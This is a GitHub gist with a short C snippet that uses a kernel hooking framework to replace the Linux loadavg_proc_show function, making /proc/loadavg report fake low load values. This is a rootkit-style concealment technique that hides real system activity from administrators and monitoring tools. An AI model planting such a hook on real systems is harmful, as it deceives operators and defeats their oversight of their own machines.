Last active
January 23, 2023 16:14
-
-
Save alfonmga/18a5dd69cc016e44ca1325905397542b to your computer and use it in GitHub Desktop.
/proc/loadavg manipulation by monkey-patching `loadavg_proc_show` function https://github.com/torvalds/linux/blob/master/fs/proc/loadavg.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <linux/seq_file.h> | |
KHOOK_EXT(int, loadavg_proc_show, struct seq_file *, void *v); | |
static int khook_loadavg_proc_show(struct seq_file *m, void *v) | |
{ | |
unsigned int random_number; | |
unsigned char rands[sizeof(unsigned int)]; | |
get_random_bytes(rands, sizeof(unsigned int)); | |
random_number = *(unsigned int*)rands; | |
random_number = (random_number % 6) + 14; | |
seq_printf(m, "0.%d 0.16 0.11 1/127 10420\n", random_number); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment